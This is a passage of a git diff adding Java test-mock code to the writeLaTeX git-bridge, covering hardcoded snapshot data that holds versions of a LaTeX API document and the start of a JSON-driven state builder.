[\\\"\\\\\\\\documentclass[a4paper]{article}\\\\n...\\\",\\\"main.tex\\\"]],\\n \\\"atts\\\":[\\n [\\\"https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png\\\",\\\"min_mean_wait_evm_7_eps_150dpi.png\\\"]]}\\n\\\\end{lstlisting}\\n\\n\\\\section{Pushing a Project to WriteLaTeX}\\n\\n\\\\subsection{Push a Project}\\n\\n\\\\begin{lstlisting}\\n# NB: JLM originally said PUT, but he now thinks POST is better\\n# NB: you must set a Content-Type: application/json header for this request\\n# in order to specify the data as JSON in the request body\\nPOST https://.../api/v0/docs/1826rqgsdb/snapshots\\nData:\\n{\\n latestVerId: integer,\\n files: [\\n {\\n name: string path (forward slashes, relative to root)\\n url: string (but only if the file is modified; else no url given)\\n }, ...\\n ]\\n postbackUrl: url to post result back to\\n}\\nResponse on success:\\n{\\n status: 202,\\n code: \\\"accepted\\\",\\n message: \\\"Accepted\\\"\\n}\\nResponse on out of date:\\n{\\n status: 409, # Conflict\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\n\\nPostback Data (METHOD POST):\\nOn success:\\n{\\n code: \\\"upToDate\\\",\\n latestVerId: integer\\n}\\nOn out of date:\\n{\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\nOn error with the files list (e.g. file extension not allowed):\\n{\\n code: \\\"invalidFiles\\\",\\n errors: [ {\\n file: the file name from the snapshot,\\n state: \\\"error\\\"|\\\"disallowed\\\"|\\\"unclean_name\\\"\\n }, ... 
]\\n}\\nIf the file's error state is unclean_name, the error object will alsocontain a property cleanFile that contains the name of the file after it has been \\\"cleaned\\\" to meet our file naming requirements; for other file error states, this property is not present.\\nOn error with the project as a whole (e.g. over quota):\\n{\\n code: \\\"invalidProject\\\",\\n message: short string message for debugging\\n errors: [ array of zero or more string messages for the user ]\\n}\\nOn unexpected error (bug):\\n{\\n code: \\\"error\\\",\\n message: \\\"Unexpected Error\\\"\\n}\\n\\\\end{lstlisting}\\n\\n\\\\section{Test Data}\\n\\nYou can use this project as one of your servermock projects. I've added an attachment and a file in a subfolder to make it a bit more interesting.\\n\\n\\\\input{foo/bar/servermock}\\n\\n\\\\includegraphics[width=\\\\linewidth]{min_mean_wait_evm_7_eps_150dpi}\\n\\n\\\\end{document}", + "main.tex"), + new SnapshotFile( + "This text is from another file.", + "foo/bar/servermock.tex")), + Arrays.asList( + new SnapshotAttachment( + "https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png", + "min_mean_wait_evm_7_eps_150dpi.png"))))); + put( + 185, + new GetForVersionResult( + new SnapshotData( + Arrays.asList( + new SnapshotFile( + "\\\\documentclass[a4paper]{article}\\n\\n\\\\usepackage[english]{babel}\\n\\\\usepackage[utf8]{inputenc}\\n\\\\usepackage{graphicx}\\n\\\\usepackage{fullpage}\\n\\\\usepackage{listings}\\n\\\\usepackage{courier}\\n\\\\usepackage{url}\\n\\n\\\\lstset{basicstyle=\\\\ttfamily,breaklines=true}\\n\\n\\\\begin{document}\\n\\\\title{API for the writeLaTeX-Git Bridge}\\n\\\\author{JLM}\\n\\\\date{\\\\today}\\n\\\\maketitle\\n\\n\\\\section{Fetching a Project from WriteLaTeX}\\n\\nThere are three API calls that will likely be of interest. You can run them against this server, \\\\url{radiant-wind-3058.herokuapp.com}, but they're not on the production server yet.\\n\\n\\\\subsection{Get Doc}\\n\\nA ``doc'' is our internal term for a ``project''. At present, this just returns the latest version number.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb\\n# => { latestVerId: 39 }\\nTODO will also include updatedAt time and user (if it was not anonymous)\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Saved Vers}\\n\\nA ``saved ver'' is a version of a doc, saved by via the versions menu. Note that this query is not currently paginated.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/saved_vers\\n# => [\\n {\\\"versionId\\\":39,\\n \\\"comment\\\":\\\"with more files\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T18:02:19Z\\\"},\\n {\\\"versionId\\\":24,\\n \\\"comment\\\":\\\"first draft\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T17:56:58Z\\\"}]\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Snapshot for Version}\\n\\nA snapshot contains the content of a project in the given version. You can safely request a snapshot of any version that is, or was at any point in the last 24 hours, (1) a saved version, or (2) the current version. 
(Older versions may or may not have been moved to cold storage.)\\n\\nThe srcs array contains (content, file name) pairs; the atts array contains (URL, file name) pairs.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/snapshots/39\\n# => {\\n \\\"srcs\\\":[\\n [\\\"This text is from another file.\\\",\\\"foo/bar/servermock.tex\\\"],\\n [\\\"\\\\\\\\documentclass[a4paper]{article}\\\\n...\\\",\\\"main.tex\\\"]],\\n \\\"atts\\\":[\\n [\\\"https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png\\\",\\\"min_mean_wait_evm_7_eps_150dpi.png\\\"]]}\\n\\\\end{lstlisting}\\n\\n\\\\section{Pushing a Project to WriteLaTeX}\\n\\n\\\\subsection{Push a Project}\\n\\n\\\\begin{lstlisting}\\n# NB: JLM originally said PUT, but he now thinks POST is better\\n# NB: you must set a Content-Type: application/json header for this request\\n# in order to specify the data as JSON in the request body\\nPOST https://.../api/v0/docs/1826rqgsdb/snapshots\\nData:\\n{\\n latestVerId: integer,\\n files: [\\n {\\n name: string path (forward slashes, relative to root)\\n url: string (but only if the file is modified; else no url given)\\n }, ...\\n ]\\n postbackUrl: url to post result back to\\n}\\nResponse on success:\\n{\\n status: 202,\\n code: \\\"accepted\\\",\\n message: \\\"Accepted\\\"\\n}\\nResponse on out of date:\\n{\\n status: 409, # Conflict\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\n\\nPostback Data (METHOD POST):\\nOn success:\\n{\\n code: \\\"upToDate\\\",\\n latestVerId: integer\\n}\\nOn out of date:\\n{\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\nOn error with the files list (e.g. file extension not allowed):\\n{\\n code: \\\"invalidFiles\\\",\\n errors: TODO\\n}\\nOn error with the project as a whole (e.g. over quota):\\n{\\n code: \\\"invalidProject\\\",\\n errors: TODO\\n}\\nOn unexpected error (bug):\\n{\\n code: \\\"error\\\",\\n message: \\\"Unexpected Error\\\"\\n}\\n\\\\end{lstlisting}\\n\\n\\\\section{Test Data}\\n\\nYou can use this project as one of your servermock projects. I've added an attachment and a file in a subfolder to make it a bit more interesting.\\n\\n\\\\input{foo/bar/servermock}\\n\\n\\\\includegraphics[width=\\\\linewidth]{min_mean_wait_evm_7_eps_150dpi}\\n\\n\\\\end{document}", + "main.tex"), + new SnapshotFile( + "This text is from another file.", + "foo/bar/servermock.tex")), + Arrays.asList( + new SnapshotAttachment( + "https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png", + "min_mean_wait_evm_7_eps_150dpi.png"))))); + put( + 175, + new GetForVersionResult( + new SnapshotData( + Arrays.asList( + new SnapshotFile( + "\\\\documentclass[a4paper]{article}\\n\\n\\\\usepackage[english]{babel}\\n\\\\usepackage[utf8]{inputenc}\\n\\\\usepackage{graphicx}\\n\\\\usepackage{fullpage}\\n\\\\usepackage{listings}\\n\\\\usepackage{courier}\\n\\\\usepackage{url}\\n\\n\\\\lstset{basicstyle=\\\\ttfamily,breaklines=true}\\n\\n\\\\begin{document}\\n\\\\title{API for the writeLaTeX-Git Bridge}\\n\\\\author{JLM}\\n\\\\date{\\\\today}\\n\\\\maketitle\\n\\n\\\\section{Fetching a Project from WriteLaTeX}\\n\\nThere are three API calls that will likely be of interest. You can run them against this server, \\\\url{radiant-wind-3058.herokuapp.com}, but they're not on the production server yet.\\n\\n\\\\subsection{Get Doc}\\n\\nA ``doc'' is our internal term for a ``project''. 
At present, this just returns the latest version number.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb\\n# => { latestVerId: 39 }\\nTODO will also include updatedAt time and user (if it was not anonymous)\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Saved Vers}\\n\\nA ``saved ver'' is a version of a doc, saved by via the versions menu. Note that this query is not currently paginated.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/saved_vers\\n# => [\\n {\\\"versionId\\\":39,\\n \\\"comment\\\":\\\"with more files\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T18:02:19Z\\\"},\\n {\\\"versionId\\\":24,\\n \\\"comment\\\":\\\"first draft\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T17:56:58Z\\\"}]\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Snapshot for Version}\\n\\nA snapshot contains the content of a project in the given version. You can safely request a snapshot of any version that is, or was at any point in the last 24 hours, (1) a saved version, or (2) the current version. (Older versions may or may not have been moved to cold storage.)\\n\\nThe srcs array contains (content, file name) pairs; the atts array contains (URL, file name) pairs.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/snapshots/39\\n# => {\\n \\\"srcs\\\":[\\n [\\\"This text is from another file.\\\",\\\"foo/bar/servermock.tex\\\"],\\n [\\\"\\\\\\\\documentclass[a4paper]{article}\\\\n...\\\",\\\"main.tex\\\"]],\\n \\\"atts\\\":[\\n [\\\"https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png\\\",\\\"min_mean_wait_evm_7_eps_150dpi.png\\\"]]}\\n\\\\end{lstlisting}\\n\\n\\\\section{Pushing a Project to WriteLaTeX}\\n\\n\\\\subsection{Push a Project}\\n\\n\\\\begin{lstlisting}\\n# NB: JLM originally said PUT, but he now thinks POST is better\\n# NB: you must set a Content-Type: application/json header for this request\\n# in order to specify the data as JSON in the request body\\nPOST https://.../api/v0/docs/1826rqgsdb/snapshots\\nData:\\n{\\n latestVerId: integer,\\n files: [\\n {\\n name: string path (forward slashes, relative to root)\\n url: string (but only if the file is modified; else no url given)\\n }, ...\\n ]\\n postbackUrl: url to post result back to\\n}\\nResponse on success:\\n{\\n status: 202,\\n code: \\\"accepted\\\",\\n message: \\\"Accepted\\\"\\n}\\nResponse on out of date:\\n{\\n status: 409, # Conflict\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\n\\nPostback Data (METHOD POST):\\nOn success:\\n{\\n code: \\\"upToDate\\\",\\n latestVerId: integer\\n}\\nOn out of date:\\n{\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\nOn error:\\n{\\n code: \\\"invalidFile\\\",\\n TODO\\n}\\n\\\\end{lstlisting}\\n\\n\\\\section{Test Data}\\n\\nYou can use this project as one of your servermock projects. 
I've added an attachment and a file in a subfolder to make it a bit more interesting.\\n\\n\\\\input{foo/bar/servermock}\\n\\n\\\\includegraphics[width=\\\\linewidth]{min_mean_wait_evm_7_eps_150dpi}\\n\\n\\\\end{document}", + "main.tex"), + new SnapshotFile( + "This text is from another file.", + "foo/bar/servermock.tex")), + Arrays.asList( + new SnapshotAttachment( + "https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png", + "min_mean_wait_evm_7_eps_150dpi.png"))))); + put( + 146, + new GetForVersionResult( + new SnapshotData( + Arrays.asList( + new SnapshotFile( + "\\\\documentclass[a4paper]{article}\\n\\n\\\\usepackage[english]{babel}\\n\\\\usepackage[utf8]{inputenc}\\n\\\\usepackage{graphicx}\\n\\\\usepackage{fullpage}\\n\\\\usepackage{listings}\\n\\\\usepackage{courier}\\n\\\\usepackage{url}\\n\\n\\\\lstset{basicstyle=\\\\ttfamily,breaklines=true}\\n\\n\\\\begin{document}\\n\\\\title{API for the writeLaTeX-Git Bridge}\\n\\\\author{JLM}\\n\\\\date{\\\\today}\\n\\\\maketitle\\n\\n\\\\section{Fetching a Project from WriteLaTeX}\\n\\nThere are three API calls that will likely be of interest. You can run them against this server, \\\\url{radiant-wind-3058.herokuapp.com}, but they're not on the production server yet.\\n\\n\\\\subsection{Get Doc}\\n\\nA ``doc'' is our internal term for a ``project''. At present, this just returns the latest version number.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb\\n# => { latestVerId: 39 }\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Saved Vers}\\n\\nA ``saved ver'' is a version of a doc, saved by via the versions menu. Note that this query is not currently paginated.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/saved_vers\\n# => [\\n {\\\"versionId\\\":39,\\n \\\"comment\\\":\\\"with more files\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T18:02:19Z\\\"},\\n {\\\"versionId\\\":24,\\n \\\"comment\\\":\\\"first draft\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T17:56:58Z\\\"}]\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Snapshot for Version}\\n\\nA snapshot contains the content of a project in the given version. You can safely request a snapshot of any version that is, or was at any point in the last 24 hours, (1) a saved version, or (2) the current version. 
(Older versions may or may not have been moved to cold storage.)\\n\\nThe srcs array contains (content, file name) pairs; the atts array contains (URL, file name) pairs.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/snapshots/39\\n# => {\\n \\\"srcs\\\":[\\n [\\\"This text is from another file.\\\",\\\"foo/bar/servermock.tex\\\"],\\n [\\\"\\\\\\\\documentclass[a4paper]{article}\\\\n...\\\",\\\"main.tex\\\"]],\\n \\\"atts\\\":[\\n [\\\"https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png\\\",\\\"min_mean_wait_evm_7_eps_150dpi.png\\\"]]}\\n\\\\end{lstlisting}\\n\\n\\\\section{Pushing a Project to WriteLaTeX}\\n\\n\\\\subsection{Push a Project}\\n\\n\\\\begin{lstlisting}\\nPUT https://.../api/v0/docs/1826rqgsdb/snapshots\\nData:\\n{\\n latestVerId: integer,\\n files: [\\n {\\n name: string path (forward slashes, relative to root)\\n url: string (but only if the file is modified; else no url given)\\n }, ...\\n ]\\n postbackUrl: url to post result back to\\n}\\nResponse on success:\\n{\\n status: 20x,\\n}\\nResponse on out of date:\\n{\\n status: 40x,\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\n\\nPostback Data (METHOD POST):\\nOn success:\\n{\\n code: \\\"upToDate\\\",\\n latestVerId: integer\\n}\\nOn out of date:\\n{\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\nOn error:\\n{\\n code: \\\"invalidFile\\\",\\n TODO\\n}\\n\\\\end{lstlisting}\\n\\n\\\\section{Test Data}\\n\\nYou can use this project as one of your servermock projects. I've added an attachment and a file in a subfolder to make it a bit more interesting.\\n\\n\\\\input{foo/bar/servermock}\\n\\n\\\\includegraphics[width=\\\\linewidth]{min_mean_wait_evm_7_eps_150dpi}\\n\\n\\\\end{document}", + "main.tex"), + new SnapshotFile( + "This text is from another file.", + "foo/bar/servermock.tex")), + Arrays.asList( + new SnapshotAttachment( + "https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png", + "min_mean_wait_evm_7_eps_150dpi.png"))))); + put( + 74, + new GetForVersionResult( + new SnapshotData( + Arrays.asList( + new SnapshotFile( + "\\\\documentclass[a4paper]{article}\\n\\n\\\\usepackage[english]{babel}\\n\\\\usepackage[utf8]{inputenc}\\n\\\\usepackage{graphicx}\\n\\\\usepackage{fullpage}\\n\\\\usepackage{listings}\\n\\\\usepackage{courier}\\n\\\\usepackage{url}\\n\\n\\\\lstset{basicstyle=\\\\ttfamily,breaklines=true}\\n\\n\\\\begin{document}\\n\\\\title{API for the writeLaTeX-Git Bridge}\\n\\\\author{JLM}\\n\\\\date{\\\\today}\\n\\\\maketitle\\n\\n\\\\section{Fetching a Project from WriteLaTeX}\\n\\nThere are three API calls that will likely be of interest. You can run them against this server, \\\\url{radiant-wind-3058.herokuapp.com}, but they're not on the production server yet.\\n\\n\\\\subsection{Get Doc}\\n\\nA ``doc'' is our internal term for a ``project''. At present, this just returns the latest version number.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb\\n# => { latestVerId: 39 }\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Saved Vers}\\n\\nA ``saved ver'' is a version of a doc, saved by via the versions menu. 
Note that this query is not currently paginated.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/saved_vers\\n# => [\\n {\\\"versionId\\\":39,\\n \\\"comment\\\":\\\"with more files\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T18:02:19Z\\\"},\\n {\\\"versionId\\\":24,\\n \\\"comment\\\":\\\"first draft\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T17:56:58Z\\\"}]\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Snapshot for Version}\\n\\nA snapshot contains the content of a project in the given version. You can safely request a snapshot of any version that is, or was at any point in the last 24 hours, (1) a saved version, or (2) the current version. (Older versions may or may not have been moved to cold storage.)\\n\\nThe srcs array contains (content, file name) pairs; the atts array contains (URL, file name) pairs.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/snapshots/39\\n# => {\\n \\\"srcs\\\":[\\n [\\\"This text is from another file.\\\",\\\"foo/bar/servermock.tex\\\"],\\n [\\\"\\\\\\\\documentclass[a4paper]{article}\\\\n...\\\",\\\"main.tex\\\"]],\\n \\\"atts\\\":[\\n [\\\"https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png\\\",\\\"min_mean_wait_evm_7_eps_150dpi.png\\\"]]}\\n\\\\end{lstlisting}\\n\\n\\\\section{Pushing a Project to WriteLaTeX}\\n\\nTODO still working on this part\\n\\n\\\\section{Test Data}\\n\\nYou can use this project as a servermock project. I've added an attachment and a file in a subfolder to make it a bit more interesting.\\n\\n\\\\input{foo/bar/servermock}\\n\\n\\\\includegraphics[width=\\\\linewidth]{min_mean_wait_evm_7_eps_150dpi}\\n\\n\\\\end{document}", + "main.tex"), + new SnapshotFile( + "This text is from another file.", + "foo/bar/servermock.tex")), + Arrays.asList( + new SnapshotAttachment( + "https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png", + "min_mean_wait_evm_7_eps_150dpi.png"))))); + put( + 39, + new GetForVersionResult( + new SnapshotData( + Arrays.asList( + new SnapshotFile( + "\\\\documentclass[a4paper]{article}\\n\\n\\\\usepackage[english]{babel}\\n\\\\usepackage[utf8]{inputenc}\\n\\\\usepackage{graphicx}\\n\\\\usepackage{fullpage}\\n\\\\usepackage{listings}\\n\\\\usepackage{courier}\\n\\\\usepackage{url}\\n\\n\\\\lstset{basicstyle=\\\\ttfamily,breaklines=true}\\n\\n\\\\begin{document}\\n\\\\title{API for the writeLaTeX-Git Bridge}\\n\\\\author{JLM}\\n\\\\date{\\\\today}\\n\\\\maketitle\\n\\n\\\\section{Fetching a Project from WriteLaTeX}\\n\\nThere are three API calls that will likely be of interest. You can run them against this server, \\\\url{radiant-wind-3058.herokuapp.com}, but they're not on the production server yet.\\n\\n\\\\subsection{Get Doc}\\n\\nA ``doc'' is our internal term for a ``project''. At present, this just returns the latest version number.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Saved Vers}\\n\\nA ``saved ver'' is a version of a doc, saved by via the versions menu. 
To list saved versions for a doc:\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/saved_vers\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Snapshot for Version}\\n\\nA snapshot contains the content of a project in the given version. You can safely request a snapshot of any version that is, or was at any point in the last 24 hours, (1) a saved version, or (2) the current version. (Older versions may or may not have been moved to cold storage.)\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/snapshots/1\\n\\\\end{lstlisting}\\n\\n\\\\section{Pushing a Project to WriteLaTeX}\\n\\nTODO still working on this part\\n\\n\\\\section{Test Data}\\n\\nYou can use this project as a servermock project. I've added an attachment and a file in a subfolder to make it a bit more interesting.\\n\\n\\\\input{foo/bar/servermock}\\n\\n\\\\includegraphics[width=\\\\linewidth]{min_mean_wait_evm_7_eps_150dpi}\\n\\n\\\\end{document}", + "main.tex"), + new SnapshotFile( + "This text is from another file.", + "foo/bar/servermock.tex")), + Arrays.asList( + new SnapshotAttachment( + "https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png", + "min_mean_wait_evm_7_eps_150dpi.png"))))); + put( + 24, + new GetForVersionResult( + new SnapshotData( + Arrays.asList( + new SnapshotFile( + "\\\\documentclass[a4paper]{article}\\n\\n\\\\usepackage[english]{babel}\\n\\\\usepackage[utf8]{inputenc}\\n\\\\usepackage{graphicx}\\n\\\\usepackage{fullpage}\\n\\\\usepackage{listings}\\n\\\\usepackage{courier}\\n\\\\usepackage{url}\\n\\n\\\\lstset{basicstyle=\\\\ttfamily,breaklines=true}\\n\\n\\\\begin{document}\\n\\\\title{API for the writeLaTeX-Git Bridge}\\n\\\\author{JLM}\\n\\\\date{\\\\today}\\n\\\\maketitle\\n\\n\\\\section{Fetching a Project from WriteLaTeX}\\n\\nThere are three API calls that will likely be of interest. You can run them against this server (radiant-wind-3058.herokuapp.com).\\n\\n\\\\subsection{Get Doc}\\n\\nA ``doc'' is our internal term for a ``project''. At present, this just returns the latest version number.\\n\\n\\\\begin{lstlisting}\\nGET https://radiant-wind.....com/api/v0/docs/1826rqgsdb\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Saved Vers}\\n\\nA ``saved ver'' is a version of a doc, saved by via the versions menu. To list saved versions for a doc:\\n\\n\\\\begin{lstlisting}\\nGET https://radiant-wind.....com/api/v0/docs/1826rqgsdb/saved_vers\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Snapshot for Version}\\n\\nA snapshot contains the content of a project in the given version. You can safely request a snapshot of any version that is, or was at any point in the last 24 hours, (1) a saved version, or (2) the current version. (Older versions may or may not have been moved to cold storage.)\\n\\n\\\\begin{lstlisting}\\nGET https://radiant-wind.....com/api/v0/docs/1826rqgsdb/snapshots/1\\n\\\\end{lstlisting}\\n\\n\\\\section{Pushing a Project to WriteLaTeX}\\n\\nTODO still working on this part\\n\\n\\\\section{Test Data}\\n\\nYou can use this project as a servermock project. 
Here is an extra file to make it a bit more interesting.\\n\\n\\\\includegraphics[width=\\\\linewidth]{min_mean_wait_evm_7_eps_150dpi}\\n\\n\\\\end{document}", + "main.tex")), + Arrays.asList( + new SnapshotAttachment( + "https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png", + "min_mean_wait_evm_7_eps_150dpi.png"))))); + } + }); + } + }; + + push = + new HashMap<String, SnapshotPushResult>() { + { + put("1826rqgsdb", new SnapshotPushResultSuccess()); + } + }; + + postback = + new HashMap<String, SnapshotPostbackRequest>() { + { + // put( + // "1826rqgsdb", + // new SnapshotPostbackRequestInvalidFiles( + // Arrays.<InvalidFileError>asList( + // new InvalidFileErrorDefault( + // "file1.invalid" + // ), + // new InvalidFileErrorDisallowed( + // "file2.exe" + // ), + // new InvalidFileErrorUnclean( + // "hello world.png", + // "hello_world.png" + // ) + // ) + // ) + // ); + // put("1826rqgsdb", new SnapshotPostbackRequestOutOfDate()); + put( + "1826rqgsdb", + new SnapshotPostbackRequestInvalidProject( + Arrays.asList( + "Your project is missing main.tex.", + "Please name your main latex file main.tex."))); + // put("1826rqgsdb", new SnapshotPostbackRequestError()); + } + }; + } + + public GetDocResult getStateForGetDoc(String projectName) { + return getDoc.get(projectName); + } + + public GetSavedVersResult getStateForGetSavedVers(String projectName) { + return getSavedVers.get(projectName); + } + + public GetForVersionResult getStateForGetForVers(String projectName, int versionID) { + return getForVers.get(projectName).get(versionID); + } + + public SnapshotPushResult getStateForPush(String projectName) { + return push.get(projectName); + } + + public SnapshotPostbackRequest getStateForPostback(String projectName) { + return postback.get(projectName); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/state/SnapshotAPIStateBuilder.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/state/SnapshotAPIStateBuilder.java new file mode 100644 index 0000000..d5dcd1b --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/state/SnapshotAPIStateBuilder.java @@ -0,0 +1,160 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.state; + +import com.google.gson.Gson; +import com.google.gson.JsonArray; +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import java.io.InputStream; +import java.io.InputStreamReader; +import java.util.*; +import uk.ac.ic.wlgitbridge.snapshot.getdoc.GetDocResult; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.GetForVersionResult; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.SnapshotAttachment; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.SnapshotData; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.SnapshotFile; +import uk.ac.ic.wlgitbridge.snapshot.getsavedvers.GetSavedVersResult; +import uk.ac.ic.wlgitbridge.snapshot.getsavedvers.SnapshotInfo; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.data.SnapshotPushResult; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.data.SnapshotPushResultOutOfDate; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.data.SnapshotPushResultSuccess; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback.*; + +/* + * Created by Winston on 11/01/15. 
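+ *
+ * Builds a SnapshotAPIState from a JSON stream. The top-level value is an
+ * array with one object per project; the required keys below are taken
+ * from the parsing code in this class, while all field values are
+ * illustrative:
+ *
+ * <pre>
+ *   [ { "project": "1826rqgsdb",
+ *       "getDoc": { "versionID": 243 },
+ *       "getSavedVers": [ { "versionID": 243, "comment": "...",
+ *                           "email": "...", "name": "...", "createdAt": "..." } ],
+ *       "getForVers": [ { "versionID": 243,
+ *                         "srcs": [ { "content": "...", "path": "main.tex" } ],
+ *                         "atts": [] } ],
+ *       "push": "success",
+ *       "postback": { "type": "outOfDate" } } ]
+ * </pre>
+ *
+ * Usage: new SnapshotAPIStateBuilder(inputStream).build()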
+ */ +public class SnapshotAPIStateBuilder { + + private final JsonArray projects; + + private Map<String, GetDocResult> getDoc = new HashMap<>(); + private Map<String, GetSavedVersResult> getSavedVers = new HashMap<>(); + private Map<String, Map<Integer, GetForVersionResult>> getForVers = new HashMap<>(); + private Map<String, SnapshotPushResult> push = new HashMap<>(); + private Map<String, SnapshotPostbackRequest> postback = new HashMap<>(); + + public SnapshotAPIStateBuilder(InputStream stream) { + projects = new Gson().fromJson(new InputStreamReader(stream), JsonArray.class); + } + + public SnapshotAPIState build() { + for (JsonElement project : projects) { + addProject(project.getAsJsonObject()); + } + return new SnapshotAPIState(getDoc, getSavedVers, getForVers, push, postback); + } + + private void addProject(JsonObject project) { + String projectName = project.get("project").getAsString(); + addGetDocForProject(projectName, project.get("getDoc").getAsJsonObject()); + addGetSavedVersForProject(projectName, project.get("getSavedVers").getAsJsonArray()); + addGetForVersForProject(projectName, project.get("getForVers").getAsJsonArray()); + addPushForProject(projectName, project.get("push").getAsString()); + addPostbackForProject(projectName, project.get("postback").getAsJsonObject()); + } + + private void addGetDocForProject(String projectName, JsonObject jsonGetDoc) { + int versionID = jsonGetDoc.get("versionID").getAsInt(); + String createdAt = null; + String email = null; + String name = null; + if 